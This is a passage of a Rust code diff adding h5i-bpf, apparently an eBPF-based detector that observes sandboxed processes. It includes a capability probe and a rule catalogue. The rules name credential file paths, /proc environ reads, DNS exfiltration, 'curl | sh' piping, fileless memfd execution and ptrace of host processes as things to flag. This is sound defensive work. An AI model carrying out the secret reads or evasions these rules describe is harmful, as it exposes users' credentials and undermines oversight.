+        assert!(e.detections.is_empty());
+        assert!(e.observed());
+    }
+}

--- a/crates/h5i-bpf/src/lib.rs
+++ b/crates/h5i-bpf/src/lib.rs
@@ -1,0 +1,391 @@
+//! h5i-bpf — runtime detection: a kernel-observed evidence lane.
+//!
+//! Every evidence lane h5i had before this one sits either at the **boundary**
+//! of a box (h5i as the parent process, the CONNECT proxy, the runner's
+//! authenticated channel) or **inside** it (the tee shim, the browser). Each
+//! is therefore defeated by the same two things: work that happens below the
+//! outermost command, and a box that declines to cooperate. This lane is
+//! neither at the boundary nor inside: the kernel reports `execve`, `connect`
+//! and `openat` whether or not anything in the box wanted them reported.
+//!
+//! The design, the alternatives that were refused, and the limits are
+//! ROADMAP.md sections D1 to D14. Three of them are worth repeating at the top
+//! of the code they govern:
+//!
+//! * **It cannot deny anything.** No `bpf_send_signal`, no
+//!   `bpf_override_return`, no LSM programs. Denial in h5i belongs to the
+//!   mechanisms that fail closed by construction, and a second thing that
+//!   sometimes blocks would blur a boundary that is currently sharp.
+//! * **It reads no kernel structure.** Syscall tracepoint arguments and stable
+//!   helpers only, so there is no CO-RE, no `vmlinux.h`, no BTF requirement,
+//!   and one object that loads on every kernel from 5.8 up.
+//! * **It never renders an absence as a clean result.** A run it could not
+//!   watch carries [`RuntimeEvidence::unavailable`] with the reason; a run it
+//!   watched incompletely carries [`Coverage::Partial`]; a run that dropped
+//!   events carries the count.
+//!
+//! ## Layout
+//!
+//! [`probe`] asks the host what it can do. [`event`] is the wire format and
+//! its decoder. [`rules`] is the signature engine — pure, and the only part
+//! that knows what a credential is. [`evidence`] is what lands in a receipt.
+//! [`scope`] decides which of the host's events belong to a box. `session`
+//! (Linux, `load` feature) is the only module that touches a kernel.
+//!
+//! ## Using it
+//!
+//! ```no_run
+//! use h5i_bpf::{DetectConfig, Watch, scope::Tier, rules::RuleContext};
+//!
+//! let cfg = DetectConfig {
+//!     tier: Tier::Process,
+//!     context: RuleContext { net_mode: "proxy".into(), ..Default::default() },
+//!     ..DetectConfig::default()
+//! };
+//! let watch = Watch::start(cfg);   // never fails; refusals become evidence
+//! // ... run the box ...
+//! let block = watch.finish();      // goes straight into the receipt
+//! ```
+
+pub mod event;
+pub mod evidence;
+pub mod probe;
+pub mod rules;
+pub mod scope;
+
+#[cfg(all(target_os = "linux", feature = "load"))]
+mod session;
+
+pub use evidence::{Coverage, Detection, RuntimeEvidence, Severity};
+pub use probe::{BpfCaps, probe as probe_host};
+pub use rules::{RULES, RuleContext, RuleSpec};
+pub use scope::Tier;
+
+/// Smallest ring buffer worth having. Below this a single `npm ci` loses
+/// events faster than a reader can drain them, and a lane whose numbers are
+/// always a lower bound teaches people to ignore the numbers.
+pub const MIN_BUFFER_KB: u32 = 64;
+/// Largest ring buffer a profile may ask for. The ceiling exists because the
+/// memory is locked kernel memory, charged to h5i.
+pub const MAX_BUFFER_KB: u32 = 16 * 1024;
+/// What a profile gets when it does not say. Sized against a `cargo build`.
+pub const DEFAULT_BUFFER_KB: u32 = 256;
+
+/// Everything a run needs to be watched.
+#[derive(Debug, Clone)]
+pub struct DetectConfig {
+    /// Which tier the run uses. Decides coverage, not behaviour.
+    pub tier: Tier,
+    /// Ring-buffer size, clamped to [`MIN_BUFFER_KB`]..=[`MAX_BUFFER_KB`].
+    pub buffer_kb: u32,
+    /// Rule selectors: ids, family names, or `*`.
+    pub rules: Vec<String>,
+    /// What the rules need to know about this box.
+    pub context: RuleContext,
+    /// Absolute path prefixes the kernel should not filter out. Built by
+    /// [`kernel_prefixes`] from the same vocabulary the rules use, so the
+    /// in-kernel filter and the userspace signatures can never drift into
+    /// disagreeing about what is interesting.
+    pub prefixes: Vec<String>,
+    /// Ship every `openat`, including read-only opens that hit no prefix.
+    /// Complete, and loud: a `cargo build` produces six figures of them.
+    pub open_all: bool,
+}
+
+impl Default for DetectConfig {
+    fn default() -> Self {
+        Self {
+            tier: Tier::Unknown,
+            buffer_kb: DEFAULT_BUFFER_KB,
+            rules: vec!["*".to_string()],
+            context: RuleContext::default(),
+            prefixes: Vec::new(),
+            open_all: false,
+        }
+    }
+}
+
+impl DetectConfig {
+    /// Resolve the rule selectors into the context, and report what did not
+    /// resolve.
+    ///
+    /// Unknown selectors are returned rather than ignored. A profile that
+    /// believes it enabled `net.direct-egres` and silently enabled nothing is
+    /// exactly the class of quiet failure this lane exists to catch elsewhere,
+    /// and it would be embarrassing to ship it here.
+    pub fn resolve(&mut self) -> Vec<String> {
+        let (on, unknown) = rules::select(&self.rules);
+        self.context.enabled = on;
+        unknown
+    }
+
+    /// Does any enabled rule need the in-kernel `.env` scan? Asked rather than
+    /// assumed so the one filter that costs a path scan is not paid for by
+    /// runs whose rule set does not want it.
+    pub fn want_dotenv(&self) -> bool {
+        self.context.enabled.is_empty() || self.context.enabled.contains("secret.dotenv")
+    }
+}
+
+/// The absolute prefixes the kernel filter should let through, derived from
+/// the rules' own vocabulary.
+///
+/// Bounded by [`event::MAX_PREFIX`], and ordered by value so that a truncation
+/// drops the least important entry rather than an arbitrary one.
+///
+/// `home` and `control_dir` are the box's paths, not the host's — a box has
+/// its own home, and a filter built from the host's would match nothing.
+pub fn kernel_prefixes(home: &str, control_dir: &str) -> Vec<String> {
+    // Most valuable first, because the tail is what a truncation drops.
+    let mut out = Vec::new();
+    // `/proc/` is broad, and it is the only way to see a read of another
+    // process's environment. The rules narrow it back down to
+    // `/proc/<pid>/environ` for a pid outside the box.
+    out.push("/proc/".to_string());
+    let control = control_dir.trim_end_matches('/');
+    if !control.is_empty() {
+        out.push(control.to_string());
+    }
+    let home = home.trim_end_matches('/');
+    if !home.is_empty() {
+        for rel in [
+            ".ssh",
+            ".aws",
+            ".config/gh",
+            ".git-credentials",
+            ".netrc",
+            ".docker",
+            ".kube",
+            ".gnupg",
+            ".npmrc",
+            ".pypirc",
+            ".config/gcloud",
+            ".config/h5i",
+        ] {
+            out.push(format!("{home}/{rel}"));
+        }
+    }
+    out.truncate(event::MAX_PREFIX);
+    out
+}
+
+/// A run being watched, or the reason it is not.
+///
+/// One type for both outcomes on purpose. A caller that had to handle "started
+/// a session" and "could not start a session" differently would eventually
+/// handle the second one by logging it, and the receipt would carry nothing —
+/// which is the failure mode this lane is a correction for.
+pub struct Watch(WatchInner);
+
+enum WatchInner {
+    #[cfg(all(target_os = "linux", feature = "load"))]
+    Live(Box<session::Session>),
+    Off(Box<RuntimeEvidence>),
+}
+
+impl Watch {
+    /// Start watching. Never fails: a refusal becomes the evidence.
+    pub fn start(mut cfg: DetectConfig) -> Self {
+        let unknown = cfg.resolve();
+        if !unknown.is_empty() {
+            return Watch::off(
+                cfg.tier,
+                format!(
+                    "the profile names {} no rule provides: {}",
+                    if unknown.len() == 1 { "a rule" } else { "rules" },
+                    unknown.join(", ")
+                ),
+            );
+        }
+
+        let caps = probe::probe();
+        if let Some(why) = caps.unavailable_reason() {
+            // "fix", not "grant": the command is sometimes a capability grant
+            // and sometimes a rebuild, and one word that covers both is better
+            // than one that is wrong half the time.
+            let why = match caps.fix {
+                Some(fix) => format!("{why} — fix: {fix}"),
+                None => why,
+            };
+            return Watch::off(cfg.tier, why);
+        }
+
+        #[cfg(all(target_os = "linux", feature = "load"))]
+        {
+            match session::Session::start(&cfg) {
+                Ok(s) => Watch(WatchInner::Live(Box::new(s))),
+                Err(why) => Watch::off(cfg.tier, why),
+            }
+        }
+        #[cfg(not(all(target_os = "linux", feature = "load")))]
+        {
+            Watch::off(
+                cfg.tier,
+                "this build was compiled without the runtime-detection collector".to_string(),
+            )
+        }
+    }
+
+    fn off(tier: Tier, why: String) -> Self {
+        #[cfg(all(target_os = "linux", feature = "load"))]
+        {
+            Watch(WatchInner::Off(Box::new(session::refused(tier, why))))
+        }
+        #[cfg(not(all(target_os = "linux", feature = "load")))]
+        {
+            let mut ev = RuntimeEvidence::unavailable(why);
+            if let (Coverage::None, Some(reason)) = tier.coverage() {
+                ev.coverage_reason = Some(reason.to_string());
+            }
+            Watch(WatchInner::Off(Box::new(ev)))
+        }
+    }
+
+    /// Is a probe actually attached? For a `--json` status line, and for the
+    /// `require = true` check, which refuses to run rather than proceed
+    /// unwatched.
+    pub fn is_live(&self) -> bool {
+        match &self.0 {
+            #[cfg(all(target_os = "linux", feature = "load"))]
+            WatchInner::Live(_) => true,
+            WatchInner::Off(_) => false,
+        }
+    }
+
+    /// Why it is not live. `None` when it is.
+    pub fn refusal(&self) -> Option<&str> {
+        match &self.0 {
+            #[cfg(all(target_os = "linux", feature = "load"))]
+            WatchInner::Live(_) => None,
+            WatchInner::Off(ev) => ev.unavailable.as_deref(),
+        }
+    }
+
+    /// Stop, and produce the block the receipt carries.
+    pub fn finish(self) -> RuntimeEvidence {
+        match self.0 {
+            #[cfg(all(target_os = "linux", feature = "load"))]
+            WatchInner::Live(s) => s.finish(),
+            WatchInner::Off(ev) => *ev,
+        }
+    }
+}
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+
+    #[test]
+    fn prefixes_are_bounded_and_absolute() {
+        let p = kernel_prefixes("/home/box", "/home/box/work/.h5i");
+        assert!(p.len() <= event::MAX_PREFIX);
+        assert!(p.iter().all(|s| s.starts_with('/')));
+        assert!(p.iter().any(|s| s.ends_with("/.ssh")));
+        assert!(p.contains(&"/proc/".to_string()));
+        assert!(p.contains(&"/home/box/work/.h5i".to_string()));
+    }
+
+    /// Every prefix must fit the kernel's fixed-size slot. One that does not
+    /// is dropped by the loader, so an over-long one here would silently
+    /// disable a filter.
+    #[test]
+    fn every_prefix_fits_the_kernel_slot() {
+        let p = kernel_prefixes("/home/a-fairly-long-username-here", "/home/x/.h5i/env/a/b/work");
+        for s in &p {
+            assert!(s.len() <= event::PREFIX_LEN, "{s} is {} bytes", s.len());
+        }
+    }
+
+    /// An empty home must not produce `/.ssh`, which is a real path and not
+    /// the one anybody meant.
+    #[test]
+    fn an_unknown_home_contributes_no_prefixes() {
+        let p = kernel_prefixes("", "");
+        assert_eq!(p, vec!["/proc/".to_string()]);
+    }
+
+    #[test]
+    fn a_trailing_slash_does_not_double_up() {
+        let p = kernel_prefixes("/home/box/", "/work/.h5i/");
+        assert!(p.contains(&"/home/box/.ssh".to_string()));
+        assert!(p.contains(&"/work/.h5i".to_string()));
+    }
+
+    #[test]
+    fn selectors_resolve_into_the_context() {
+        let mut cfg = DetectConfig {
+            rules: vec!["net".into(), "kernel.bpf".into()],
+            ..Default::default()
+        };
+        assert!(cfg.resolve().is_empty());
+        assert!(cfg.context.enabled.contains("net.direct-egress"));
+        assert!(cfg.context.enabled.contains("kernel.bpf"));
+        assert!(!cfg.context.enabled.contains("secret.read"));
+        assert!(!cfg.want_dotenv());
+    }
+
+    /// A typo in a profile must stop the run being reported as watched. The
+    /// alternative is a box that quietly has one fewer rule than its policy
+    /// says.
+    #[test]
+    fn an_unknown_selector_refuses_rather_than_silently_narrowing() {
+        let cfg = DetectConfig {
+            rules: vec!["nte.direct-egress".into()],
+            ..Default::default()
+        };
+        let w = Watch::start(cfg);
+        assert!(!w.is_live());
+        let why = w.refusal().unwrap().to_string();
+        assert!(why.contains("nte.direct-egress"), "{why}");
+        let ev = w.finish();
+        assert!(!ev.observed());
+    }
+
+    /// `Watch::start` is on the run path. It must never panic and must always
+    /// produce a block, whatever the host is.
+    #[test]
+    fn starting_always_produces_a_block() {
+        let w = Watch::start(DetectConfig {
+            tier: Tier::Workspace,
+            ..Default::default()
+        });
+        let live = w.is_live();
+        let ev = w.finish();
+        assert_eq!(ev.lane, evidence::LANE);
+        if !live {
+            assert!(ev.unavailable.is_some(), "an unwatched run must say why");
+            assert!(!ev.observed());
+        }
+    }
+
+    /// The microVM tier's reason has to survive even when the refusal is about
+    /// something else entirely: "you lack CAP_BPF" would otherwise imply that
+    /// granting it would help, and on a guest kernel it would not.
+    #[test]
+    fn the_microvm_reason_survives_an_unrelated_refusal() {
+        let w = Watch::start(DetectConfig {
+            tier: Tier::Microvm,
+            rules: vec!["no.such-rule".into()],
+            ..Default::default()
+        });
+        let ev = w.finish();
+        assert_eq!(ev.coverage, Coverage::None);
+        assert!(
+            ev.coverage_reason.as_deref().unwrap_or("").contains("guest"),
+            "{:?}",
+            ev.coverage_reason
+        );
+    }
+
+    /// The collector rounds a requested buffer up to a power of two, so a
+    /// default that is not one would silently become a different number than
+    /// the one documented.
+    #[test]
+    fn a_requested_buffer_is_clamped_into_the_documented_range() {
+        let clamp = |kb: u32| kb.clamp(MIN_BUFFER_KB, MAX_BUFFER_KB).next_power_of_two();
+        assert_eq!(clamp(DEFAULT_BUFFER_KB), DEFAULT_BUFFER_KB);
+        assert_eq!(clamp(0), MIN_BUFFER_KB);
+        assert_eq!(clamp(u32::MAX), MAX_BUFFER_KB);
+        assert_eq!(clamp(100), 128);
+    }
+}

--- a/crates/h5i-bpf/src/probe.rs
+++ b/crates/h5i-bpf/src/probe.rs
@@ -1,0 +1,283 @@
+//! What this host can actually do, asked rather than assumed.
+//!
+//! Every field here is measured — the kernel version off `osrelease`, the
+//! capabilities off this process's own `CapEff` mask, the object off whether
+//! the build script produced one. Nothing is inferred from "it is Linux, so
+//! presumably".
+//!
+//! The [`BpfCaps::fix`] field is the part that earns its keep. A detector that
+//! reports "unavailable" and stops is a detector people disable; one that says
+//! *which* capability is missing and prints the command that grants it is one
+//! they turn on. h5i does not run that command — it does not escalate its own
+//! privileges (ROADMAP.md D12) — it just stops making the user work out what
+//! the refusal meant.
+//
+// Most of this module describes a Linux facility, so on every other target the
+// helpers below are reached by nothing and read as dead code. Allowed
+// module-wide rather than cfg-gated one function at a time, which is the shape
+// `h5i-sandbox`'s `cgroup.rs` already settled on for the same reason: the
+// alternative is a cfg attribute on each helper *and* on each of its tests,
+// and it breaks on the cross-check job rather than here, where nobody can
+// compile a Darwin target to find out.
+#![cfg_attr(not(target_os = "linux"), allow(dead_code))]
+
+use serde::{Deserialize, Serialize};
+
+/// The kernel this collector needs, and why: `BPF_MAP_TYPE_RINGBUF` landed in
+/// 5.8. Older kernels get a refusal, never a silent fall back to perf buffers
+/// — a quieter, lossier transport that would make the numbers in a receipt
+/// mean something different without saying so.
+pub const MIN_KERNEL: (u32, u32) = (5, 8);
+
+/// `CAP_PERFMON`, `CAP_BPF` — the two the loader needs on a modern kernel.
+/// `CAP_SYS_ADMIN` subsumes both and is what a root process has.
+const CAP_SYS_ADMIN: u32 = 21;
+const CAP_PERFMON: u32 = 38;
+const CAP_BPF: u32 = 39;
+
+/// What the host offers the runtime-detection lane.
+#[derive(Debug, Clone, Default, Serialize, Deserialize, PartialEq, Eq)]
+pub struct BpfCaps {
+    pub os: String,
+    /// `major.minor.rest`, verbatim from the kernel.
+    #[serde(default, skip_serializing_if = "Option::is_none")]
+    pub kernel: Option<String>,
+    /// Whether [`MIN_KERNEL`] is met.
+    pub ringbuf: bool,
+    /// This build carries a compiled probe. False when `clang` could not
+    /// target BPF at build time, or when the `load` feature is off.
+    pub object: bool,
+    /// `CAP_BPF` (or `CAP_SYS_ADMIN`) is in this process's effective set.
+    pub cap_bpf: bool,
+    /// `CAP_PERFMON` (or `CAP_SYS_ADMIN`) is in this process's effective set.
+    pub cap_perfmon: bool,
+    /// `/sys/kernel/btf/vmlinux` exists. **Not** required — this probe is
+    /// CO-RE-free (ROADMAP.md D5) — and reported because its absence is the
+    /// first thing anyone familiar with other eBPF tools will ask about.
+    pub kernel_btf: bool,
+    /// `/sys/kernel/tracing/events` is readable, so tracepoint `format` files
+    /// can be parsed and the probe's assumed field offsets verified rather
+    /// than trusted. Not required either; its absence downgrades a check, not
+    /// the collector.
+    pub tracefs: bool,
+    /// The whole question, answered once.
+    pub usable: bool,
+    /// Why not, when not.
+    #[serde(default, skip_serializing_if = "Option::is_none")]
+    pub detail: Option<String>,
+    /// The command that would fix it, when there is one.
+    #[serde(default, skip_serializing_if = "Option::is_none")]
+    pub fix: Option<String>,
+}
+
+impl BpfCaps {
+    /// The one-line reason a run would carry in its `runtime` block. `None`
+    /// when the detector can attach.
+    pub fn unavailable_reason(&self) -> Option<String> {
+        if self.usable {
+            None
+        } else {
+            Some(
+                self.detail
+                    .clone()
+                    .unwrap_or_else(|| "runtime detection unavailable".to_string()),
+            )
+        }
+    }
+}
+
+/// True when this build carries a compiled probe object.
+pub const fn has_object() -> bool {
+    cfg!(all(target_os = "linux", feature = "load", h5i_bpf_object))
+}
+
+/// Ask the host. Cheap: three small file reads, no privileged syscall, no
+/// process spawn — so it is safe to call from a status path.
+pub fn probe() -> BpfCaps {
+    #[cfg(target_os = "linux")]
+    {
+        probe_linux()
+    }
+    #[cfg(not(target_os = "linux"))]
+    {
+        BpfCaps {
+            os: std::env::consts::OS.to_string(),
+            usable: false,
+            detail: Some(format!(
+                "eBPF is a Linux facility; this host is {}. The confinement tier on this \
+                 platform is Seatbelt, which is enforcement rather than observation, and there \
+                 is no equivalent lane to offer here.",
+                std::env::consts::OS
+            )),
+            ..Default::default()
+        }
+    }
+}
+
+#[cfg(target_os = "linux")]
+fn probe_linux() -> BpfCaps {
+    let kernel = std::fs::read_to_string("/proc/sys/kernel/osrelease")
+        .ok()
+        .map(|s| s.trim().to_string());
+    let version = kernel.as_deref().and_then(parse_kernel);
+    let ringbuf = version.map(|v| v >= MIN_KERNEL).unwrap_or(false);
+    let (cap_bpf, cap_perfmon) = effective_caps();
+    let object = has_object();
+
+    let mut caps = BpfCaps {
+        os: "linux".into(),
+        kernel,
+        ringbuf,
+        object,
+        cap_bpf,
+        cap_perfmon,
+        kernel_btf: std::path::Path::new("/sys/kernel/btf/vmlinux").exists(),
+        tracefs: tracefs_readable(),
+        usable: false,
+        detail: None,
+        fix: None,
+    };
+
+    // Ordered by what a user can do about it: a missing object is a build
+    // problem, a missing capability is a one-command problem, an old kernel is
+    // neither.
+    if !object {
+        caps.detail = Some(
+            "this build carries no eBPF probe — it was compiled without the `bpf` feature, or \
+             with no clang that can target BPF"
+                .into(),
+        );
+        caps.fix = Some("cargo install --path . --features bpf".into());
+        return caps;
+    }
+    if !ringbuf {
+        caps.detail = Some(format!(
+            "kernel {} is older than {}.{}, which is where BPF_MAP_TYPE_RINGBUF landed",
+            caps.kernel.as_deref().unwrap_or("(unknown)"),
+            MIN_KERNEL.0,
+            MIN_KERNEL.1
+        ));
+        return caps;
+    }
+    if !cap_bpf || !cap_perfmon {
+        let missing = match (cap_bpf, cap_perfmon) {
+            (false, false) => "CAP_BPF and CAP_PERFMON",
+            (false, true) => "CAP_BPF",
+            _ => "CAP_PERFMON",
+        };
+        caps.detail = Some(format!(
+            "h5i is missing {missing}; loading a BPF program and attaching it to a tracepoint \
+             both require them"
+        ));
+        // The binary's own path, so the command can be pasted. h5i never runs
+        // this itself: granting capabilities to a process is the user's
+        // decision, and asking for them silently is what this product exists
+        // to stop other software doing.
+        let exe = std::env::current_exe()
+            .map(|p| p.display().to_string())
+            .unwrap_or_else(|_| "$(command -v h5i)".into());
+        caps.fix = Some(format!("sudo setcap cap_bpf,cap_perfmon=ep {exe}"));
+        return caps;
+    }
+
+    caps.usable = true;
+    caps
+}
+
+/// `5.15.0-91-generic` → `(5, 15)`.
+fn parse_kernel(s: &str) -> Option<(u32, u32)> {
+    let mut it = s.split(['.', '-', '+']);
+    let major = it.next()?.parse().ok()?;
+    let minor = it.next()?.parse().ok()?;
+    Some((major, minor))
+}
+
+/// Read the effective capability set out of `/proc/self/status`.
+///
+/// `capget(2)` would be the direct answer and needs no parsing, but it is a
+/// raw syscall with a versioned struct, and this is a diagnostic: the cost of
+/// getting the struct subtly wrong is worse than the cost of parsing a hex
+/// number. Returns `(cap_bpf, cap_perfmon)`, with `CAP_SYS_ADMIN` counting for
+/// both — which is what makes running as root work.
+#[cfg(target_os = "linux")]
+fn effective_caps() -> (bool, bool) {
+    let Ok(status) = std::fs::read_to_string("/proc/self/status") else {
+        return (false, false);
+    };
+    let Some(line) = status.lines().find_map(|l| l.strip_prefix("CapEff:")) else {
+        return (false, false);
+    };
+    let Ok(mask) = u64::from_str_radix(line.trim(), 16) else {
+        return (false, false);
+    };
+    let has = |bit: u32| mask & (1u64 << bit) != 0;
+    let admin = has(CAP_SYS_ADMIN);
+    (admin || has(CAP_BPF), admin || has(CAP_PERFMON))
+}
+
+#[cfg(target_os = "linux")]
+fn tracefs_readable() -> bool {
+    ["/sys/kernel/tracing/events", "/sys/kernel/debug/tracing/events"]
+        .iter()
+        .any(|p| std::fs::read_dir(p).is_ok())
+}
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+
+    #[test]
+    fn kernel_versions_parse() {
+        assert_eq!(parse_kernel("5.15.0-91-generic"), Some((5, 15)));
+        assert_eq!(parse_kernel("6.6.87.2-microsoft-standard-WSL2"), Some((6, 6)));
+        assert_eq!(parse_kernel("4.19.0"), Some((4, 19)));
+        assert_eq!(parse_kernel("nonsense"), None);
+        assert_eq!(parse_kernel(""), None);
+    }
+
+    #[test]
+    fn the_ringbuf_floor_is_where_ringbuf_landed() {
+        assert!((5, 8) >= MIN_KERNEL);
+        assert!((6, 6) >= MIN_KERNEL);
+        assert!((5, 4) < MIN_KERNEL);
+        assert!((4, 19) < MIN_KERNEL);
+    }
+
+    /// The probe must never panic or block: it is called from `box status`,
+    /// from the console's probe route, and from the run path.
+    #[test]
+    fn probing_is_safe_to_call_anywhere() {
+        let c = probe();
+        assert!(!c.os.is_empty());
+        if !c.usable {
+            assert!(c.detail.is_some(), "an unusable host must say why");
+        }
+    }
+
+    /// The unusable answer has to be actionable where it can be. A missing
+    /// capability is the common case on a real install, and "unavailable" with
+    /// no next step is how a security feature stays off forever.
+    #[test]
+    fn a_fixable_refusal_carries_its_fix() {
+        let c = probe();
+        if !c.usable && c.object && c.ringbuf {
+            assert!(c.fix.is_some(), "a capability refusal must name the command");
+        }
+    }
+
+    #[test]
+    fn caps_round_trip_through_json() {
+        let c = probe();
+        let j = serde_json::to_string(&c).unwrap();
+        let back: BpfCaps = serde_json::from_str(&j).unwrap();
+        assert_eq!(c, back);
+    }
+
+    #[cfg(not(target_os = "linux"))]
+    #[test]
+    fn a_non_linux_host_says_so_rather_than_pretending() {
+        let c = probe();
+        assert!(!c.usable);
+        assert!(c.detail.unwrap().contains("Linux"));
+    }
+}

--- a/crates/h5i-bpf/src/rules.rs
+++ b/crates/h5i-bpf/src/rules.rs
@@ -1,0 +1,1239 @@
+//! The signatures: from an event stream to a set of detections.
+//!
+//! Pure, in the sense that matters: no I/O, no clock, no privileges, no
+//! kernel. [`Engine::observe`] is a fold over events and [`Engine::finish`]
+//! reads the accumulator out. That is not tidiness for its own sake — it is
+//! the only way this layer can be tested at all, because attaching a probe
+//! needs capabilities no CI runner grants, and a detection engine nobody can
+//! test is a detection engine nobody should believe.
+//!
+//! The split is the one Tracee draws (ROADMAP.md D3): the collector below
+//! knows about syscalls and nothing about meaning; this layer knows about
+//! meaning and has never seen a ring buffer.
+//!
+//! ## What a rule is allowed to claim
+//!
+//! Every path in an event is a string a process passed to a syscall, captured
+//! at `sys_enter`. It is not the kernel's resolution of that string: symlinks
+//! are unfollowed, `..` is unresolved, a relative path is relative to a
+//! directory fd this probe does not know, and in principle the bytes can
+//! change between the read and the kernel's use of them. So a path-matching
+//! rule is a **heuristic over caller-supplied strings** and is documented as
+//! one (ROADMAP.md D13.3). That is the price of a CO-RE-free probe, and it is
+//! the right price for an observation-only lane: a false positive costs a
+//! reviewer a glance, and the alternative costs every user a BTF toolchain.
+
+use std::collections::{BTreeMap, HashSet};
+
+use crate::event::{Event, EventKind, Family};
+use crate::evidence::{Detection, MAX_EXAMPLE_LEN, MAX_EXAMPLES, Severity};
+
+/// One signature, as data. `h5i box detect rules` prints this table, so what
+/// the detector looks for is inspectable without reading Rust.
+#[derive(Debug, Clone, Copy, PartialEq, Eq)]
+pub struct RuleSpec {
+    pub id: &'static str,
+    pub family: &'static str,
+    pub severity: Severity,
+    /// One line, carried into the receipt with every detection.
+    pub title: &'static str,
+    /// Why it is worth knowing. Printed by `detect rules`, not stored.
+    pub detail: &'static str,
+}
+
+/// The catalogue. Adding a rule means adding a row here and a case in
+/// [`Engine::observe`]; the test at the bottom of this file fails if the two
+/// ever disagree, so a rule can never be listed and unimplemented.
+pub const RULES: &[RuleSpec] = &[
+    // ---------------------------------------------------------------- net
+    RuleSpec {
+        id: "net.direct-egress",
+        family: "net",
+        severity: Severity::Alert,
+        title: "dialled a routable address directly, around the egress allowlist",
+        detail: "A `connect(2)` to a routable address from a box whose network policy is an \
+                 allowlist or a denial. The CONNECT proxy can only rule on traffic that goes \
+                 through it, so a socket dialled at a literal address is invisible to it by \
+                 construction — and on the workspace tier, where there is no network namespace \
+                 to force the issue, this is the only thing that would notice. It reports the \
+                 *attempt*: the probe sees the syscall going in, not the answer coming back, so \
+                 a connect the netns refused looks exactly like one that succeeded. On a \
+                 `net.mode = deny` box that is the useful reading — the box tried.",
+    },
+    RuleSpec {
+        id: "net.raw-socket",
+        family: "net",
+        severity: Severity::Alert,
+        title: "opened a raw or packet socket",
+        detail: "`SOCK_RAW`, or any `AF_PACKET` socket. A development box has no honest use for \
+                 either; they are how traffic is sniffed or forged below the level anything else \
+                 here inspects.",
+    },
+    RuleSpec {
+        id: "net.unix-socket",
+        family: "net",
+        severity: Severity::Notice,
+        title: "dialled a Unix socket on a profile that did not grant them",
+        detail: "The supervised tier denies `AF_UNIX` unless the profile sets `unix_sockets`. \
+                 The other tiers do not, so on those this is the only report that a box reached \
+                 a local daemon — a D-Bus, a container runtime, an agent socket.",
+    },
+    RuleSpec {
+        id: "net.dns-direct",
+        family: "net",
+        severity: Severity::Notice,
+        title: "resolved names against a nameserver of its own choosing",
+        detail: "A connect to port 53 or 853. Ordinary for a box with unrestricted networking, \
+                 and worth a line on one that is supposed to be proxied: DNS is a serviceable \
+                 exfiltration channel and it is not HTTP, so the proxy never sees it.",
+    },
+    // ------------------------------------------------------------- secret
+    RuleSpec {
+        id: "secret.read",
+        family: "secret",
+        severity: Severity::Alert,
+        title: "opened a credential file",
+        detail: "An open of a well-known credential path: `.ssh`, `.aws/credentials`, \
+                 `.config/gh`, `.git-credentials`, `.netrc`, `.kube/config`, \
+                 `.docker/config.json`, `.npmrc`, `.pypirc`, `.gnupg`. Filesystem grants are \
+                 directories and credentials are files inside them, so a profile that grants \
+                 `$HOME` cannot express this and only observation can report it.",
+    },
+    RuleSpec {
+        id: "secret.dotenv",
+        family: "secret",
+        severity: Severity::Notice,
+        title: "opened a .env file outside the workspace",
+        detail: "A `.env`-family file that is not the project's own. Reading the workspace's \
+                 `.env` is the job; reading one from somewhere else is somebody else's secrets.",
+    },
+    RuleSpec {
+        id: "secret.proc-environ",
+        family: "secret",
+        severity: Severity::Alert,
+        title: "read another process's environment",
+        detail: "An open of `/proc/<pid>/environ` for a pid that is not part of this box. That \
+                 file is where a host process keeps its API keys, and reading it is the classic \
+                 way out of a boundary that only guarded the filesystem.",
+    },
+    RuleSpec {
+        id: "secret.h5i-state",
+        family: "secret",
+        severity: Severity::Alert,
+        title: "opened h5i's own control directory for writing",
+        detail: "A write-intent open under the box's `.h5i` directory. That is where the \
+                 manifest, the policy and the receipts live: a box editing it is a box editing \
+                 the evidence about itself.",
+    },
+    // --------------------------------------------------------------- exec
+    RuleSpec {
+        id: "exec.from-tmp",
+        family: "exec",
+        severity: Severity::Notice,
+        title: "executed a binary from a temporary directory",
+        detail: "An exec of a path under `/tmp`, `/var/tmp` or `/dev/shm`. Build systems do \
+                 this legitimately and so does every dropper ever written; the value is that \
+                 the two are now distinguishable by looking rather than by assuming.",
+    },
+    RuleSpec {
+        id: "exec.memfd",
+        family: "exec",
+        severity: Severity::Alert,
+        title: "executed a file that was never on disk",
+        detail: "A `memfd_create` followed by an exec of the resulting descriptor by the same \
+                 process. Fileless execution: nothing is written, so nothing can be scanned, \
+                 and the only trace is the pair of syscalls. This is the reason `memfd_create` \
+                 is collected at all.",
+    },
+    RuleSpec {
+        id: "exec.interpreter-pipe",
+        family: "exec",
+        severity: Severity::Notice,
+        title: "piped a download into a shell",
+        detail: "A shell invoked with `-c` whose command line has the download-and-execute \
+                 shape (`curl … | sh`). It is how half the software on the internet is \
+                 installed and how the other half is compromised.",
+    },
+    RuleSpec {
+        id: "exec.package-manager",
+        family: "exec",
+        severity: Severity::Info,
+        title: "ran a package manager",
+        detail: "npm, pnpm, yarn, pip, cargo, gem, go, bundle, poetry or uv. Not suspicious. \
+                 Present because \"what installed things, and when\" is the first question \
+                 asked of any supply-chain incident, and it is a miserable question to answer \
+                 after the fact.",
+    },
+    // --------------------------------------------------------- privilege
+    RuleSpec {
+        id: "priv.ptrace",
+        family: "priv",
+        severity: Severity::Alert,
+        title: "attached a debugger to a process outside the box",
+        detail: "A `ptrace` request against a pid this run never spawned. Attaching to a host \
+                 process reads its memory, which is every secret it holds.",
+    },
+    RuleSpec {
+        id: "priv.namespace",
+        family: "priv",
+        severity: Severity::Notice,
+        title: "changed namespaces",
+        detail: "`unshare` or `setns`. The supervised tier denies `unshare` outright; the other \
+                 tiers do not, and a new user namespace is the first step of most attempts to \
+                 acquire capabilities the box was not given.",
+    },
+    RuleSpec {
+        id: "kernel.bpf",
+        family: "kernel",
+        severity: Severity::Alert,
+        title: "called bpf(2)",
+        detail: "The box loading BPF of its own. Worth an alert on its own terms, and worth it \
+                 twice over here: this lane is itself BPF, and a box that can load programs is \
+                 a box in a position to argue with the thing watching it.",
+    },
+    RuleSpec {
+        id: "kernel.module",
+        family: "kernel",
+        severity: Severity::Alert,
+        title: "tried to load a kernel module",
+        detail: "`init_module` or `finit_module`. Nothing a development box does needs this. \
+                 It will fail without `CAP_SYS_MODULE`; that it was attempted is the finding.",
+    },
+    RuleSpec {
+        id: "mount.change",
